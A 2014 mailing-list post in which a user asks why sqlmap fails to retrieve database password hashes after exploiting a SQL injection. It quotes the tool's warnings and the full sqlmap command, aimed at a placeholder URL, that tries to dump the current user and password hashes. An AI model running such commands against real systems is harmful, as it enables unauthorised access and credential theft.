[sqlmap-users] unable to fench password with sqlmap
Brought to you by:
inquisb
From: Sabin R. <thi...@gm...> - 2014-04-29 09:19:25
|
hi, I have sql injection, i can get the current user with the --current-user command but when i option for password then sqlmap couldnt do it. it says: [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [05:13:51] [WARNING] unable to retrieve the number of password hashes for user 'busroute' [05:13:51] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system database table) [05:13:51] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 3 times Is this the usual way to mitigate the sqli risk. or this is the sqlmap error that needs to be option in. the used following command: #sqlmap -u http://example.com/br/create?key=1 --dbms="MySQL" --risk=3 level=3 -p key --current-user --password --technique=B thanks kind regards, |